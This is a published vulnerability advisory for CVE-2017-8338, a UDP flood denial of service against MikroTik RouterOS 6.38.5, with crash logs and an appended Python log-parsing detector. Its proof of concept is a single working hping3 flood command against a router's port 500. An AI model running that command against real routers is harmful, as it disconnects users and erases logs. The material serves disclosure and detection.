MikroTik UDP Flood Denial of Service

2017.05.10
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-400


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

################
#Exploit Title: MikroTik UDP Flood Denial of Service | kernel failure
#Reference: https://www.vulnerability-lab.com/get_content.php?id=2064
#CVE: CVE-2017-8338
#CWE: CWE-400
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: https://mikrotik.com/
#Version : V-6.38.5
#Exploit Tested on: Parrot Security OS
#Date: 09-05-2017
#Category: Network Appliance
#Author Mail : hosein.askari@aol.com
#Description: A vulnerability in MikroTik Version 6.38.5 could allow an unauthenticated remote attacker to exhaust all available CPU via a flood of UDP packets on port 500 (used for L2TP over IPsec), preventing the affected router from accepting new connections; all devices will be disconnected from the router and all logs removed automatically.
###############
Proof of Concept (PoC):
The denial of service vulnerability can be exploited by remote attackers without user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

hping3 --udp -p 6000 --destport 500 --flood [router's IP]

#########################
#Log:
apr/27/2017 04:37:47 system,error,critical kernel failure in previous boot
apr/27/2017 04:37:47 system,error,critical out of memory condition was detected
apr/27/2017 04:33:36 system,error,critical router was rebooted without proper shutdown by watchdog timer
########################
#The sample of "CPU Usage" :
[admin@MikroTik] > system resource monitor
cpu-used: 100%
cpu-used-per-cpu: 100%
free-memory: 2487KiB
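For triage, the three critical entries in the log excerpt above can be matched as one signature in exported router logs. The following is an added example, not part of the original advisory: it assumes logs in the same line format as the excerpt, the function names and the 10-minute window are hypothetical, and a match indicates a resource-exhaustion crash without proving its cause.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: the advisory's three log lines plus one unrelated line.
SAMPLE_LOG = """\
apr/27/2017 04:33:36 system,error,critical router was rebooted without proper shutdown by watchdog timer
apr/27/2017 04:37:47 system,error,critical out of memory condition was detected
apr/27/2017 04:37:47 system,error,critical kernel failure in previous boot
apr/27/2017 04:40:02 system,info unrelated constructed entry
"""
MONTHS = "jan feb mar apr may jun jul aug sep oct nov dec".split()
LINE_RE = re.compile(
    r"^([a-z]{3})/(\d{2})/(\d{4}) (\d{2}):(\d{2}):(\d{2}) (\S+) (.+)$")
SIGNATURES = {  # message fragments taken from the advisory's log excerpt
    "watchdog": "rebooted without proper shutdown by watchdog timer",
    "oom": "out of memory condition was detected",
    "kernel": "kernel failure in previous boot",
}

def parse(text):
    """Yield (timestamp, topics, message); skip lines that do not match."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or m.group(1) not in MONTHS:
            continue
        mon, day, year, hh, mi, ss = m.groups()[:6]
        ts = datetime(int(year), MONTHS.index(mon) + 1, int(day),
                      int(hh), int(mi), int(ss))
        yield ts, set(m.group(7).split(",")), m.group(8)

def find_exhaustion_crashes(text, window=timedelta(minutes=10)):
    """Report each time span in which all three critical signatures occur."""
    hits = sorted((ts, name) for ts, topics, msg in parse(text)
                  if "critical" in topics
                  for name, needle in SIGNATURES.items() if needle in msg)
    findings, i = [], 0
    while i < len(hits):
        group = [h for h in hits[i:] if h[0] - hits[i][0] <= window]
        if {name for _, name in group} == set(SIGNATURES):
            findings.append({"start": group[0][0], "end": group[-1][0]})
            i += len(group)   # consume the whole crash sequence
        else:
            i += 1
    return findings

if __name__ == "__main__":
    for f in find_exhaustion_crashes(SAMPLE_LOG):
        print("resource-exhaustion crash signature:", f["start"], "->", f["end"])
```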

References:

https://www.vulnerability-lab.com/get_content.php?id=2064

